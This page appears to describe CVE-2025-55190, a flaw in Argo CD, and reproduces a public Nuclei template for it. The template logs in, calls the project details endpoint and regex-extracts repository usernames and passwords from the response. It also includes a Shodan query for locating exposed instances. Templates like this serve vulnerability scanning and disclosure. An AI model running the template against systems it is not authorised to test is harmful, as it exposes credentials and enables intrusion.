CVE-2025-55190: ArgoCD Project API Token Repository Credentials Exposure

漏洞描述

Argo CD API tokens with project-level permissions are able to retrieve sensitive repository credentials (usernames, passwords) through the project details API endpoint, even when the token only has standard application management permissions and no explicit access to secrets. This vulnerability affects versions v2.2.0-rc1 and later, including 2.13.0 through 2.13.8, 2.14.0 through 2.14.15, 3.0.0 through 3.0.12, and 3.1.0-rc1 through 3.1.1. Any token with project get permissions is vulnerable, including global permissions. Note: This template requires valid ArgoCD credentials (username/password) to test the vulnerability.

PoC代码[已公开]

id: CVE-2025-55190

info:
  name: ArgoCD Project API Token Repository Credentials Exposure
  author: nukunga[seunghyeonJeon]
  severity: critical
  description: |
    Argo CD API tokens with project-level permissions are able to retrieve sensitive repository credentials
    (usernames, passwords) through the project details API endpoint, even when the token only has standard
    application management permissions and no explicit access to secrets. This vulnerability affects versions
    v2.2.0-rc1 and later, including 2.13.0 through 2.13.8, 2.14.0 through 2.14.15, 3.0.0 through 3.0.12,
    and 3.1.0-rc1 through 3.1.1. Any token with project get permissions is vulnerable, including global permissions.
    Note: This template requires valid ArgoCD credentials (username/password) to test the vulnerability.
  reference:
    - https://github.com/argoproj/argo-cd/security/advisories/GHSA-786q-9hcg-v9ff
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55190
    - https://github.com/argoproj/argo-cd/commit/e8f86101f5378662ae6151ce5c3a76e9141900e8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-55190
    epss-score: 0.06081
    epss-percentile: 0.90348
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"argo cd"
  tags: cve,cve2025,argocd,credentials,exposure,gitops,kubernetes

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /api/v1/session HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    extractors:
      - type: json
        name: token
        part: body
        internal: true
        json:
          - '.token'

  - raw:
      - |
        GET /api/v1/projects/default/detailed HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

    matchers-condition: and
    matchers:

      - type: word
        part: body
        words:
          - '"repositories":'
          - '"username":'
          - '"password":'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: exposed_credentials
        part: body
        group: 1
        regex:
          - '"repositories":\[.*?"username":"([^"]+)".*?"password":"([^"]+)"'
# digest: 4a0a00473045022100926acca725a4d7ae5b6f445ddc420cb328ec0cb7cf7910f2fdb44fbd3705727e022064683bae7c862ac9612576dd3683955da36a799d1edfff1ed9d9583d730a4ac1:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-55190.yaml